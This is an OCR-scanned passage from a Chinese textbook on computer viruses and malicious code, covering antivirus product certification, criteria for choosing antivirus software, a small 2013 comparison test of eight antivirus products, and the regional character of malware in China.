检验 中 心 负责 计算 机 病毒 防治 产品 ,移动 终端 病毒 防治 产品 ,移动 终端 防火 墙 产 品 \ 企 
业 移 动 终 端 安 全 管理 产品 .计算 机 主机 安全 检测 产品 、 防 病毒 网 关 、 网 络 病 毒 监控 系统 
(VDS) ,智能 移动 终端 未 成 年 人 保护 产品 、 公 众 移动 终端 安全 管理 产品 、 虚 拟 化 安全 防护 产 
品 、 高 级 可 持续 威胁 (APT) 安 全 监测 产品 等 11 大 类 产品 申请 销售 许可 证 的 检测 ,并 定期 与 
不 定期 地 对 计算 机 防治 病毒 产品 质量 进行 抽查 。 截 至 目前 ,检验 中 心 已 对 200 余 个 厂商 
1000 多 个 产品 进行 了 测试 ,建成 了 下 一 代 高 性 能 网 络 设备 测试 平台 ,满足 不 同 平台 要 求 的 
单机 病毒 防治 产品 测试 平台 ,满足 不 同 企业 级 环境 要 求 的 网 络 病毒 防治 产品 测试 平台 ,满足 
网 关 产 品 、VDS 产品 的 网 络 测 试 平台 ,以 及 APT 检测 产品 测试 平台 和 移动 安全 产品 的 测试 

台 。 

计算 机 病毒 防治 产品 检验 和 认证 工作 是 一 个 新 的 检验 认证 领域 ,国家 和 行业 标准 体系 
尚 不 健全 。 近 年 来 ,检验 中 心 依托 多 年 技术 和 经 验 优 势 ,起 草 了 多 项 国家 标准 行业 标准 和 
检验 规范 ,参与 编制 了 中 华人 民 共 和 国 社会 公共 安全 行业 标准 《计算 机 病毒 防治 产品 评级 准 
则 )GA243 一 2000)《 移 动 终端 病毒 防治 产品 评级 准则 》(GA849 一 2009) 等 。 


11.3 国内 外 著名 杀毒 软件 比较 


恶意 代码 在 给 人 类 带 来 危害 的 同时 ,也 带 来 了 巨大 的 商机 。 于 是 ,很 多 企业 涉足 这 个 领 
域 并 开发 出 了 林林总总 的 恶意 代码 防范 产品 。 粗 略 统计 ,国内 知名 恶意 代码 防范 产品 的 品 
牌 有 十 多 家 ,全 世界 有 不 少 于 100 家 。 面 对 如 此 多 的 产品 ,一般 用 户 将 做 出 什么 样 的 选择 ? 
为 了 对 抗 现 阶段 的 恶意 代码 ,恶意 代码 防范 产品 需要 具备 哪些 必要 的 功能 ? 


11.3.1 杀毒 软件 必 备 功能 


基于 安全 方面 的 考虑 ,每 一 个 计算 机 用 户 或 企业 信息 系统 管理 者 都 应 该 选择 一 款 正版 
的 杀毒 软件 以 预防 各 种 类 型 的 恶意 破坏 。 使 用 盗版 杀毒 软件 带 来 的 质量 和 服务 问题 都 会 像 
恶意 代码 一 样 危害 到 用 户 的 安全 。 一 些 安全 防范 知识 很 少 及 初学 计算 机 又 怕 被 恶意 代码 感 
染 的 用 户 在 花 钱 买 安 全 时 ,如 何 选 择 一 款 优秀 的 杀毒 软件 成 了 摆 在 他 们 面前 的 首要 问题 。 


@ ”国家 计算 机 病毒 应 急 处 理 中 心 ,http://www. cverc. org. cn/。 
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接 下 来 介绍 选择 杀毒 软件 时 应 注意 的 问题 。 

1. 查 杀 能 力 

这 项 功能 是 恶意 代码 防范 软件 最 原始 也 是 最 基本 的 能 力 , 是 考察 一 款 恶 意 代 码 防 范 
软件 是 否 优秀 的 重要 指标 之 一 。 杀 毒 必 先 识 毒 ,也 就 是 说 恶意 代码 防范 软件 必须 首先 能 
够 做 到 对 恶意 代码 的 有 效 检测 识别 。 传 统 的 反 病毒 软件 以 恶意 代码 特征 码 匹配 扫描 为 
基础 ,但 是 随 着 恶意 代码 技术 的 不 断 发 展 和 恶意 代码 数量 的 不 断 增加 ,简单 的 特征 码 匹 
配 慢 慢 变 为 文件 头 检测 等 一 系列 比较 复杂 的 行为 特征 识别 机 制 。 为 了 对 付 变形 恶意 代 
码 和 未 知 恶意 代码 ,要求 恶 意 代 码 防范 软件 具备 一 种 * 自 我 发 现 的 能 力 或 “运用 某 种 方 
式 或 方法 去 判定 事物 的 知识 和 能 力 ”, 恶 意 代码 防范 软件 采用 了 虚拟 机 等 新 技术 ,通过 虚 
拟 机 将 可 执行 文件 在 内 存 还 原 ,捕捉 其 执行 行为 特征 ,再 通过 恶意 代码 库 进行 加 权 处 理 。 

恶意 代码 防范 软件 在 查 毒 误 报 率 方面 的 准确 性 也 是 一 项 重要 指标 ,一 款 好 的 恶意 代码 
防范 软件 , 既 要 避免 漏 报 带 来 的 安全 隐患 ,也 要 避免 误 报 给 广大 用 户 带 来 的 损失 。 当 发 生 误 
报时 ,恶意 代码 防范 软件 有 可 能 将 正常 文件 误 报 成 恶意 代码 ,也 可 能 将 一 种 新 出 现 的 恶意 代 
码 误 报 成 其 他 恶意 代码 ,或 者 将 一 些 恶意 代码 误 报 成 多 种 恶意 代码 。 

另外 ,恶意 代码 防范 软件 对 恶意 代码 的 清除 能 力 和 自身 的 防御 能 力也 是 其 基本 功能 。 

2. 防范 新 恶意 代码 的 能 力 

对 新 恶意 代码 的 发 现 和 处 理 是 否 及 时 ,是 考察 一 个 防 病毒 软件 好 坏 的 另 一 个 非常 重要 
的 因素 。 这 一 点 主要 由 3 个 因素 决定 : 软件 供应 商 的 恶意 代码 信息 收集 网 络 .供应 商 对 用 
户 发 现 的 新 恶意 代码 的 反应 周期 和 恶意 代码 的 更 新 周期 。 

通常 ,恶意 代码 防范 软件 供应 商都 会 在 全 国 甚至 全 世界 各 地 建立 一 个 恶意 代码 信息 的 
收集 、 分 析 和 预测 网 络 ,使 其 软件 能 更 加 及 时 ,有效 地 查 杀 新 出 现 的 恶意 代码 。 因 此 ,这 一 收 
集 网 络 在 一 定 程度 上 反映 了 软件 商 对 新 恶意 代码 的 反应 能 力 。 

3. 备份 和 恢复 能 力 

虽然 数据 恢复 和 数据 备份 在 某 种 程度 上 说 并 不 是 恶意 代码 防范 软件 的 主要 功能 ,但 是 
在 目前 恶意 代码 程序 越 来 越 狭 独 ,破坏 数据 资料 越 来 越 狠毒 的 情况 下 ,一 款 好 的 杀毒 软件 应 
该 具备 足够 的 备份 数据 文件 和 恢复 数据 的 能 力 。 

4. 实时 监控 能 力 

按照 统计 ,邮件 系统 和 网 页 是 目前 最 常见 的 恶意 代码 传播 方式 。 这 些 传播 途径 具有 一 
定 的 实时 性 ,而 用 户 在 感染 一 段 时 间 后 还 无 法 察觉 。 因 此 ,恶意 代码 防范 软件 的 实时 监测 能 
力 就 显得 相当 重要 。 目 前 绝 大 多 数 恶意 代码 防范 软件 都 具有 实时 监控 功能 ,但 实时 监测 的 
信息 范围 仍 值得 注意 。 

5. 升级 能 力 

在 网 络 世界 里 ,新 恶意 代码 是 层出不穷 的 ,尤其 是 蠕虫 ,具有 相当 快 的 传播 速度 和 繁殖 
能 力 , 如 果 恶 意 代码 防范 软件 不 能 及 时 升级 应 对 , 短 时 间 内 就 可 能 会 造成 大 批 的 计算 机 被 恶 
意 代码 感染 ,所 以 恶意 代码 防范 软件 的 升级 能 力 是 非常 关键 的 。 而 且 这 种 升级 信息 也 需要 
和 安装 一 样 能 方便 地 “分 发 ”到 各 个 终端 。 

各 个 恶意 代码 防范 软件 的 特征 码 更 新 周期 都 不 尽 相同 ,有 的 一 周 更 新 一 次 ,有 的 半 个 月 
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更 新 一 次 。 对 用 户 发 现 的 新 恶意 代码 的 反应 周期 不 仅 能 够 体现 出 厂商 对 新 恶意 代码 的 反应 
速度 ,而 且 也 反映 了 厂商 对 新 恶意 代码 查 杀 的 技术 实力 。 

6. 智能 安装 能 力 

在 局 域 网 中 ,由 于 服务 器 ,客户 端 承担 的 任务 不 同 ,对 恶意 代码 防范 软件 的 功能 要 求 也 
不 大 一 样 。 因 此 如 果 恶 意 代码 防范 软件 在 安装 时 能 够 自动 区 分 服务 器 与 客户 端 ,并 进行 相 
应 的 安装 ,这 对 管理 员 来 说 将 是 一 件 十 分 方便 的 事情 。 远 程 安装 和 远程 设置 也 是 网 络 防 毒 
区 别 于 单机 防毒 的 一 个 关键 点 。 这 样 一 来 ,管理 员 在 进行 安装 .设置 的 工作 时 就 不 再 需要 来 
回 奔波 于 各 台 终 端 ,从 繁重 的 工作 中 解放 出 来 , 既 可 以 对 全 网 的 机 器 进行 统一 安装 ,又 可 以 
有 针对 性 地 进行 设置 。 

7. 简单 易 用 

界面 操作 风格 应 该 注重 简单 易 用 、 美 观 大 方 。 

系统 的 可 管理 性 是 需要 管理 员 特 别 注意 的 部 分 。 管 理 员 应 该 从 系统 整体 角度 出 发 对 各 
台 计 算 机 进行 设置 。 如 果 人 允许 各 员工 随意 修改 自己 使 用 计算 机 上 的 防毒 软件 参数 ,可 能 会 
给 整个 安全 体系 带 来 一 些 意 想 不 到 的 漏洞 ,使 恶意 代码 乘虚 而 入。 

生成 恶意 代码 监控 报告 等 辅助 管理 措施 可 以 帮助 管理 者 随时 随地 了 解 局 域 网 内 各 台 计 
算 机 的 安全 情况 ,并 借 此 制订 或 调整 恶意 代码 防范 策略 ,这 将 有 助 于 恶意 代码 防范 软件 的 应 
用 更 加 得 心 应 手 。 

为 了 降低 用 户 企业 的 管理 难度 ,有 些 恶 意 代 码 防范 软件 采用 了 远程 管理 的 措施 ,一些 企 
业 用 户 的 恶意 代码 防范 管理 由 专业 厂商 的 控制 中 心 专门 管理 。 

8. 资源 占用 情况 

恶意 代码 防范 程序 需要 占用 部 分 系统 资源 来 进行 实时 监控 ,这 就 不 可 避免 地 要 带 来 系 
统 性 能 的 降低 。 特 别 是 执行 对 邮件 、 网 页 和 FTP 文件 的 监控 扫描 任务 时 ,工作 量 相当 大 ,所 
以 会 占用 较 多 的 系统 资源 。 有 些 用 户 会 感觉 上 网 速度 太 慢 ,这 在 某 种 程度 上 是 恶意 代码 防 
范 程序 对 网 页 执行 监控 扫描 带 来 的 影响 。 

另 一 种 是 升级 信息 的 交换 ,下 载 和 分 发 升级 信息 都 将 或 多 或 少 地 占用 网 络 带宽 。 
但 多 数 产 品 每 次 升级 信息 包 的 数据 不 过 几 兆 字 节 而 已 ,这 一 影响 比 起 其 他 方面 要 小 
得 多 。 

9. 兼容 性 

系统 兼容 性 并 不 仅仅 是 选 购 恶意 代码 防范 软件 时 需要 考虑 的 ,在 采购 其 他 应 用 软件 时 
都 要 尽量 避免 与 恶意 代码 防范 软件 发 生 冲 突 。 恶 意 代码 防范 软件 的 一 部 分 常 驻 程序 如 果 与 
其 他 应 用 软件 不 兼容 ,将 带 来 很 大 的 问题 。 

10. 价格 

就 价格 来 说 ,企业 级 恶意 代码 防范 软件 初次 购买 和 后 继 的 升级 费用 大 多 是 按照 网 络 规 
模 来 确定 的 。 购 买 后 ,恶意 代码 防范 厂商 一 般 会 提供 一 定时 期 的 免费 升级 ,而 此 后 的 升级 及 
服务 如 何 收费 也 需要 做 到 心中 有 数 。 

对 不 同 的 用 户 来 讲 , 不 同 的 选 购 参数 应 该 有 不 同 的 权重 。 企 业 可 以 根据 具体 系统 的 情 
况 确定 哪 一 因素 作为 购买 时 最 重要 的 参考 。 
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11. 厂商 的 实力 

软件 厂商 的 实力 表现 在 两 方面 : 一 方面 是 指 它 对 现 有 产品 的 技术 支持 和 服务 能 力 ; 另 
一 方面 是 指 它 的 后 续 发 展 能 力 。 因 为 企业 级 恶意 代码 防范 软件 实际 是 用 户 企 业 与 厂商 的 长 
期 合作 ,软件 厂商 的 实力 将 会 影响 这 种 合作 的 持续 性 ,从 而 影响 到 用 户 企 业 在 此 方面 的 投入 
成 本 。 
11.3.2 流行 杀毒 产品 比较 


恶意 代码 防范 产品 的 数量 越 来 越 多 ,用 户 也 越 来 越 难 以 决策 选择 何 种 产品 来 保护 自己 
的 个 人 计算 机 和 网 络 的 安全 。 针 对 这 个 问题 ,有 很 多 权威 部 门 和 民间 组 织 发 布 过 一 些 测试 
报告 ,目的 是 指导 用 户 选 择 产品 ,但 有 时 也 有 做 产品 宣传 的 嫌疑 。 在 此 ,作者 选择 部 分 产品 
进行 了 简单 测试 。 

测试 对 象 是 使 用 比较 普遍 的 几 款 杀毒 软件 ,如 Avast\ Avira( 小 红 伞 )、.AVG .金山 毒霸 、 
360 杀毒 .瑞星 杀毒 .卡巴 斯 基 和 NOD32 等 。 

测试 所 采用 的 样本 病毒 主要 包括 感染 型 类 、 后 门类 和 木马 类 ,它们 均 为 2013 年 2 月 20 
日 到 3 月 27 日 新 增 的 样本 ,数量 约 为 600 个 。 由 于 测试 样本 来 自 网 络 搜 集 ,不 排除 有 个 别 
其 他 类 别 的 病毒 样本 ,但 是 这 对 测试 结果 不 会 产生 很 大 影响 。 这 里 特别 感谢 kafan 论坛 、 
virussign. com 网 站 提供 的 病毒 样本 下 载 。 

1. 软件 空闲 资源 占用 测试 

此 项 测试 数据 来 自 于 正常 桌面 状态 ,无 各 类 程序 运行 或 文件 操作 ,测试 软件 也 未 进行 扫 
描 或 更 新 等 行为 。 测 试 结果 如 表 11-1 所 示 。 


表 11-1 空闲 时 资源 占用 情况 


序 号 安全 软件 名 称 空闲 时 占用 内 存 /MB 
出 金山 -新 毒霸 “悟空 ”SP1. 5 34 
卡巴 斯 基 反 病毒 软件 2013 116 
3 ESET NOD32 Anti-Virus 66 
4 诺顿 Anti-Virus 120 
5 AVG AntiVirus 29 
6 AVAST 9 
7 360 杀毒 25 
8 瑞星 杀毒 软件 26 


这 里 可 以 发 现 一 部 分 软件 的 内 存 资源 占用 在 30MB 以 下 ,而 另 一 部 分 却 在 100MB 以 
上 ,这 是 因为 后 者 一 般 具 有 对 非 运 行 的 文件 操作 (如 粘贴 解压 缩 等 ) 的 实时 监控 功能 ,因此 
多 占 一 些 内 存 是 正常 的 。 

2. 扫描 资源 占用 测试 

此 项 测试 数据 来 自 于 使 用 测试 软件 进行 普通 的 全 盘 扫 描 状 态 。 此 项 数据 对 一 般 在 启动 
时 会 自动 进行 一 次 的 操作 也 适用 。 测 试 结 果 如 表 11-2 所 示 。 
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表 11-2 扫描 时 资源 占用 情况 


序 号 安全 软件 名 称 CPU 占用 率 占用 内 存 /MB 
1 金山 -新 毒霸 “悟空 ”SP1. 5 10% 80 
; 卡巴 斯 基 反 病毒 软件 2013 22% 170 
3 ESET NOD32 Anti-Virus 7% 61 
4 诺顿 Anti-Virus 26% 210 
5 AVG AntiVirus 15% 120 
6 AVAST 5% 40 
360 杀毒 8% 65 
8 瑞星 杀毒 软件 12% 100 

注 ; 此 处 的 CPU 占用 率 是 整个 扫描 过 程 的 平均 占用 率 。 

3. 检 出 能 力 测试 


本 项 测试 针对 同一 份 病毒 样本 集 ,所 有 测试 软件 均 在 同一 天 进行 了 更 新 ,但 由 于 网 络 原 
因 及 可 能 出 现 的 免费 版 本 限制 等 ,不 同 测试 软件 的 病毒 数据 库 日 期 会 有 3 天 之 内 的 差别 。 
但 这 种 情况 和 实际 使 用 时 是 一 致 的 ,测试 结果 如 表 11-3 所 示 。 


表 11-3 检 出 能 力 测试 表 


序 号 安全 软件 名 称 检测 出 的 数量 检 出 率 

1 金山 -新 毒霸 “悟空 ”SP1. 5 528 87% 
2 卡巴 斯 基 反 病毒 软件 2013 598 99% 
3 ESET NOD32 Anti-Virus 585 97% 
4 AVG Anti-Virus 0 0 

[3 诺顿 Anti-Virus 206 29% 
6 AVAST 541 81% 
~ 360 杀毒 591 98% 
8 瑞星 杀毒 软件 591 98% 


注 : AVG 可 能 因为 是 免费 版 ,虽然 更 新 了 病毒 库 , 但 是 依然 无 法 检测 出 任何 一 个 病毒 样本 。 


4. 病毒 查 杀 性 能 测试 
本 项 测试 数据 为 上 一 项 测试 的 补充 ,给 出 了 查 杀 的 时 间 。 因 为 病毒 样本 均 放 在 同一 文 
件 夹 内 ,因此 这 里 补充 统计 的 是 查 杀 此 文件 夹 所 需 的 时 间 ,如 表 11-4 所 示 。 
表 11-4 查 杀 所 需 时 间 列 表 


序 号 安全 软件 名 称 查 杀 所 需 时 间 /s 
d 金山 -新 毒霸 “悟空 ”SP1.5 122 
2 卡巴 斯 基 安 全 部 队 2013 61 
3 ESET NOD32 Anti-Virus 220 
4 诺顿 Anti-Virus 87 
5 AVG AntiVirus 10 
6 AVAST 14 
LE 360 杀毒 27 
8 瑞星 杀毒 软件 239 
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11.3.3 恶意 代码 防范 产品 的 地 缘 性 


1. 产生 恶意 代码 地 缘 性 的 因素 

由 于 恶意 代码 的 传播 是 受 介 质 和 条 件 限制 的 ,因此 在 不 同 的 历史 阶段 形成 了 不 同 的 地 
缘 性 特征 。 以 下 因素 是 产生 恶意 代码 地 缘 性 的 主要 原因 。 

1) 编制 者 的 生活 空间 

最 早 的 恶意 代码 完全 依靠 软盘 介质 传播 ,传播 速度 比较 慢 ,除了 一 些 大 批量 的 染 毒 介质 
可 能 造成 瞬间 的 大 面积 传播 外 ,一 般 恶意 代码 的 传播 以 恶意 代码 编制 者 初始 的 地 点 为 中 心 ， 
缓慢 地 向 周围 扩散 。 

2) 特定 的 操作 系统 及 软件 环境 

通过 仔细 调查 后 会 发 现 ,如 果 FreeBSD 系统 在 某 地 比较 流行 , 则 某 地 最 可 能 流传 BSD 
系统 的 蠕虫 ; 中 国 大 陆 的 Windows 系统 普及 率 最 高 ,那么 基于 Windows 系统 的 恶意 代码 
也 就 最 多 。 这 是 因为 ,恶意 代码 若 要 获得 比较 强 的 生命 力 ,造成 大 规模 传播 ,只 有 选择 寄生 
于 主流 操作 系统 。 由 于 不 同 地 域 人 群 可 能 会 对 系统 环境 有 不 同 的 选择 ,因此 恶意 代码 编制 
者 会 据 此 做 出 不 同 的 考虑 。 除 了 操作 系统 外 ,一 些 可 能 传播 恶意 代码 的 软件 环境 也 是 恶意 
代码 地 缘 性 的 原因 之 一 。 例 如 , 宏 病 毒 ,irc. worm、p2p. worm outlook 等 特殊 环境 的 蠕虫 ， 
都 依赖 于 特定 的 软件 环境 甚至 软件 的 版 本 。 

3) 定向 性 攻击 和 条 件 传 播 

在 传统 病毒 之 后 发 展 出 一 种 称 为 “网 络 蠕虫 ”的 新 型 恶意 代码 , 它 在 攻击 和 传播 上 有 别 
于 传统 病毒 , 它 可 以 根据 IP 地 址 范围 做 定向 性 的 扫描 ,同时 还 可 以 根据 运行 操作 系统 的 请 
言 或 其 他 特性 判别 是 否 感 当 。 网 络 蠕虫 的 这 种 定向 性 攻击 和 条 件 传播 改变 了 传统 病毒 以 扩 
散 点 为 中 心 的 特性 。 

2. 地 缘 性 对 恶意 代码 防范 产品 的 影响 

恶意 代码 产生 之 初 ,是 以 磁盘 为 主要 介质 的 ,因而 传播 速度 比较 慢 。 由 于 政策 性 和 其 他 
因素 ,国内 反 病毒 产 品 和 国外 没有 实际 的 竞争 。 随 着 攻防 双方 技术 的 发 展 ,DOS 时 代 的 几 
个 病毒 家 族 在 中 国 本 土 的 制造 技术 逐渐 成 熟 ,而 且 都 比较 完整 地 综合 了 一 些 新 的 技术 手段 。 
纵 观 DOS 时 代 , 与 中 国 大 陆 具 有 亲缘 关系 的 病毒 ,总数 比较 少 ,基本 没有 出 现 几 十 乃至 上 百 
种 变种 的 庞大 家 族 。 这 些 国产 病毒 的 陆续 出 现 ,客观 上 增加 了 用 户 对 国内 产品 的 信任 。 当 
时 ,除了 CPAYV 外 ,国内 用 户 对 国外 产品 缺乏 了 解 , 虽 然 有 盗版 光盘 流入 ,但 由 于 难以 升级 ， 
因此 也 很 少 使 用 。 同 时 ,当时 多 数 国 外 产品 在 国内 确实 没有 代理 机 构 ,也 并 没有 样本 采集 网 
络 , 对 国内 样本 的 搜集 也 比较 迟钝 。 因 此 ,当时 国内 的 几 个 主要 的 反 病 毒 产 品 确实 占 了 绝对 
优势 。 

这 种 状况 在 宏 病毒 出 现 后 发 生 了 骤然 变 化 。 安 病毒 采用 类 BASIC 语言 ,编写 非常 容 
易 , 加 上 Macro. Word. Concept 病毒 的 源码 迅速 被 公开 , 宏 病 毒 数量 瞬间 呈 级 数 增长 。 中 国 
台湾 是 亚太 地 区 的 一 个 重要 的 病毒 生产 基地 。 当 时 有 很 多 宏 病 毒 在 台湾 地 区 先 流行 起 来 ， 
然后 又 流入 大 陆 。 其 中 ,非常 有 代表 性 的 是 台湾 1 号 宏 病 毒 家 族 ,传播 范围 非常 广 , 变 种 也 
很 多 。 

由 于 微软 未 公开 Office 文档 的 二 进 制 结构 ,当时 国内 几 家 恶意 代码 防范 企业 与 微软 的 
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相关 谈判 都 以 失败 告终 ,因此 国内 厂家 只 能 用 各 种 比较 粗糙 的 办 法 来 争取 时 间 ,力求 通过 逆 
向 工程 破解 Office 文档 的 二 进 制 结构 。 有 些 厂家 不 得 不 暂时 使 用 “以 宏 杀 宏 ” 的 临时 措施 ， 
有 些 则 采用 简单 地 搜索 宏 指 令 的 位 置 , 然 后 将 其 后 20 个 字 节 清 零 以 使 宏 病 毒 失效 的 方法 。 
而 形成 对 比 的 是 当时 国外 一 些 企业 (如 McAfee 等 ) 很 容易 地 从 微软 取得 了 Office 文档 结 
构 。 应 该 说 ,这 种 企业 的 “地 缘 性 ”差异 ,让 中 国 恶 意 代 码 防 范 企 业 在 自己 的 家 门口 第 一 次 感 
受到 了 压力 。 

微软 系统 从 16 位 平台 向 32 位 平台 跨越 的 过 程 中 ,系统 内 核 也 随 之 发 生 了 很 大 的 变化 ， 
文件 结构 经 历 了 MZ、NE .PE 的 过 渡 , 而 系统 的 权限 结构 也 逐渐 严格 。 这 使 得 大 量 DOS 病 
毒 失去 传播 能 力 , 同 时 也 给 了 国内 厂商 在 查 杀 流 行 病 毒 方 面 重新 和 国外 企业 站 到 一 个 起 跑 
线 上 的 机 会 。 

由 于 编制 Win32 平台 病毒 需要 编制 者 对 Win32 系统 的 结构 和 PE 文件 结构 做 比较 深 
入 的 分 析 , 在 Windows 时 代 的 前 期 ,病毒 出 现 的 节奏 开始 减 慢 。 而 Win32 系统 所 提供 的 多 
进程 .多 任务 的 特性 ,使 恶意 代码 防范 产品 真正 实现 了 实时 监控 技术 。 此 时 ,境外 主流 商用 
产品 开始 全 面向 企业 级 解决 方案 过 渡 。 来 自 台 湾 地 区 的 CIH ,是 一 个 标志 性 的 PE 病毒 。 

由 于 网 络 在 这 个 阶段 开始 普及 ,国外 恶意 代码 防范 软件 厂商 开始 进入 国内 市 场 并 获得 
用 户 认 可 , 相 较 从 前 也 更 容易 获取 国内 恶意 代码 样本 ,因此 在 对 国内 恶意 代码 的 响应 速度 
上 ,基本 能 做 到 与 国内 恶意 代码 防范 软件 同步 。 与 此 同时 ,国内 厂商 也 逐渐 积累 了 足够 的 实 
力 , 可 以 对 流入 国内 的 境外 恶意 代码 做 出 迅速 响应 。 因 此 虽然 在 查 杀 恶意 代码 总 数 上 与 国 
外 软件 相 比 ,国内 主流 软件 有 一 定 优势 ,但 在 中 国内 地 这 个 特定 的 区 域内 ,双方 基本 持平 ,都 
没有 明显 差距 。 当 时 ,专家 们 也 曾经 认为 ,在 Internet 的 普及 、 样 本 交换 等 诸多 因素 的 影响 
下 ,地 缘 性 问题 已 经 基本 消亡 。 但 随即 发 生 的 变化 , 则 向 男 一 个 方向 发 展 ,使 地 缘 性 成 为 对 
国外 主流 产品 的 新 挑战 。 

3. 地 缘 性 对 国外 主流 产品 的 新 挑战 

目前 ,中 国 新 恶意 代码 的 地 缘 性 表现 在 以 下 几 点 。 

1) 中 国 已 经 成 为 全 球 恶意 代码 扩散 的 中 心 节 点 之 一 

Worm. Solaris. Sadmind 是 第 一 个 造成 较 大 影响 的 国产 蠕虫 , 它 基 于 Solaris 系统 传播 ， 
可 以 多 线程 扫描 IP, 如 果 发 现 远 端 是 NT 系统 ,并 具有 IIS 漏洞 ,就 修改 Web 页 面 。 其 后 国 
产 典 型 蠕虫 大 量 涌现 ,如 IIS-Worm. BlueCode IIS-Worm. CodeRed IIS-Worm. CodeGreen， 
直到 类 似 Worm. Nimda 长 时 间 肆 虐 的 蠕虫 ,这些 蠕虫 都 有 一 定 的 技术 特点 ,与 造成 微软 
源码 失窃 的 Worm. Qaz 一 样 ,都 被 怀疑 出 自 国人 之 手 。 这 个 阶段 的 蠕虫 ,在 编制 技术 上 表 
现 出 一 些 创 新 点 ,而 不 像 最 早 的 国内 恶意 代码 ,只 是 修改 显示 特性 或 感染 标记 ,好 一 点 的 也 
只 是 综合 了 国外 恶意 代码 的 技术 经 验 , 这 些 恶 意 代码 体现 出 网 络 安全 问题 和 主机 安全 问题 
的 融合 性 ,同时 也 告诉 人 们 ,中 国正 在 成 为 全 球 恶意 代码 扩散 的 中 心 节点 之 一 。 

2) 木马 大 量 出 现 

国产 木马 程序 开始 爆发 式 增长 ,这 一 时 期 比较 有 代表 性 的 木马 程序 有 冰河 、 广 外 女生 、 
网 络 神 偷 等 。 当 时 ,国外 的 主流 木马 基本 是 开放 式 架 构 , 可 扩展 插件 ,甚至 提供 跨 平台 特性 ， 
逐步 向 协作 方向 发 展 ,如 BO2K、SubSeven 等 一 些 典 型 木马 。 与 之 相 比 ,国内 木马 表现 出 完 
全 不 同 的 走势 ,技术 上 侧重 于 对 恶意 代码 防范 产品 的 对 抗 。 虽 然 国 内 木马 有 一 些小 的 、 比 较 
突出 的 技术 构想 ,但 从 整个 技术 含量 上 已 经 落后 于 国外 。 可 是 国内 木马 的 种 类 和 小 版 本 更 


294 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


新 的 速度 更 令 人 有 瞳 目 结 舌 。 

3) 针对 国内 网 络 工具 的 专用 木马 大 量 出 现 

当前 ,由 于 利益 的 驱使 ,相当 数量 的 国产 木马 程序 都 以 窃取 网 络 游戏 相关 信息 为 目的 。 
例如 ,国内 的 QQ 和 边锋 、 联 众 、 传 奇 等 网 络 游戏 就 颇 受 国产 木马 的 青睐 ,而 这 些 应 用 产品 在 
欧美 基本 没有 用 户 , 因 此 ,这 些 样本 往往 得 不 到 一 些 国际 主流 安全 企业 的 重视 。 

以 上 几 点 基本 构成 了 当今 中 国 新 的 恶意 代码 地 缘 性 特色 。 这 种 特色 不 仅 给 国外 在 中 国 
的 主流 反 恶 意 代码 产品 构成 了 严峻 的 挑战 ,也 给 中 国 本 土产 品 带 来 了 很 大 的 挑战 。 

4. 国外 主流 产品 的 本 土 化 改造 

由 于 恶意 代码 的 地 缘 特 性 ,使 反 恶 意 代 码 产 品 的 本 土 化 与 其 他 软件 产品 的 “本 土 化 就 是 
汉化 ”的 概念 完全 不 同 。 国 外 主流 产品 虽然 在 查 杀 恶意 代码 总 数 积累 ,全 球 恶意 代码 采集 网 
络 、 引 擎 和 产品 结构 ,企业 级 反 恶 意 代码 模式 等 方面 优 于 国内 产品 ,但 也 必须 解决 好 如 下 间 
题 : 如 何 有 效 地 对 抗 本 土 恶 意 代码 的 新 技术 点 ; 如 何 更 迅速 地 采集 并 响应 本 土 恶意 代码 样 
本 ; 如 何 使 产品 逐步 符合 中 国 用 户 的 习惯 ; 如 何 推广 企业 级 的 反 恶 意 代码 思路 ; 如 何 让 国 
内 用 户 认 识 到 国际 产品 的 技术 优势 。 

为 了 解决 本 土 化 问题 ,国外 恶意 代码 防范 企业 基本 上 走 了 如 下 几 条 道路 。 

(1) 在 中 国 建立 分 支 机 构 ,不 设立 研发 部 门 ,通过 用 户 渠道 解决 相关 问题 。 这 种 方式 成 
本 低 , 但 是 在 很 多 方面 都 受到 一 定 限制 。 

(2) 在 国内 建立 独立 研发 中 心 ,完成 汉化 和 本 土 恶意 代码 处 理 。 这 种 方式 效果 好 ,但 是 
成 本 比较 高 。 

(3) 与 国内 反 恶 意 代 码 企 业 合资 ,使 国内 现 有 品牌 结合 国外 先进 的 引擎 ,利用 原 有 企业 
力量 完成 汉化 和 本 土 恶意 代码 处 理 。 这 种 方式 需要 一 定 的 机 遇 。 

(4) 与 国内 反 恶 意 代 码 企业 进行 合作 ,借助 各 自 优 势 进行 产品 推广 。 这 种 方式 较为 灵 
活 , 基 于 利益 的 绑 定 使 得 双方 各 有 所 得 。 

例如 ,知名 厂商 卡巴 斯 基 2003 年 进入 中 国 市 场 后 ,最 初 反响 平平 。2006 年 年 中 卡巴 斯 
基 开 始 与 奇 虎 360 合作 ,用 户 安装 360 安全 卫士 可 以 免费 获 赠 卡 巴 斯 基 杀毒 软件 ,双方 借助 
对 方 的 渠道 达成 了 飞速 成 长 。 在 不 到 2 年 的 时 间 里 ,360 安全 卫士 没有 花 一 分 钱 广告 费 在 
中 国 拥有 了 超过 1 亿 的 用 户 ,卡巴 斯 基 也 一 举 成 为 当时 国内 最 大 的 盒 装 杀毒 软件 厂商 。 


11.4 企业 级 恶意 代码 防治 方案 


经 过 几 十 年 的 发 展 , 尽 管 恶意 代码 防治 技术 仍然 在 发 展 , 但 单机 用 户 的 杀毒 方案 已 经 趋 
于 稳定 。 随 着 网 络 技术 的 日 益 发 展 ,3 恶意 代码 的 传播 途径 越 来 越 广 ,传播 速度 越 来 越 快 , 造 
成 的 危害 越 来 越 大 ,几乎 到 了 令 人 防不胜防 的 地 步 。 在 网 络 普 及 率 非常 高 的 今天 ,单机 用 户 
恶意 代码 防治 方案 的 重要 地 位 也 逐渐 被 企业 级 恶意 代码 防治 方案 取代 。 很 多 企业 在 建立 了 
一 个 完整 的 网 络 平台 之 后 ,急需 一 个 切实 可 行 的 防 恶意 代 码 解决 方案 , 既 要 确保 整个 企业 的 
业务 数据 不 受到 恶意 代码 的 破坏 ,又 要 保障 日 常 工 作 不 受 恶 意 代 码 的 侵扰 。 

防 病毒 软件 的 易 管理 性 和 全 面 防毒 功能 是 多 数 企业 网 络 管理 者 关注 的 焦点 。 现 在 的 恶 
意 代码 防范 软件 已 不 仅仅 是 检测 和 清除 恶意 代码 。 企 业 级 的 恶意 代码 防范 方案 应 更 加 注重 
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对 恶意 代码 的 防护 工作 ,通过 远程 安装 全 面部 署 防范 软件 ,保证 不 出 现 漏洞 。 因 此 ,远程 安 
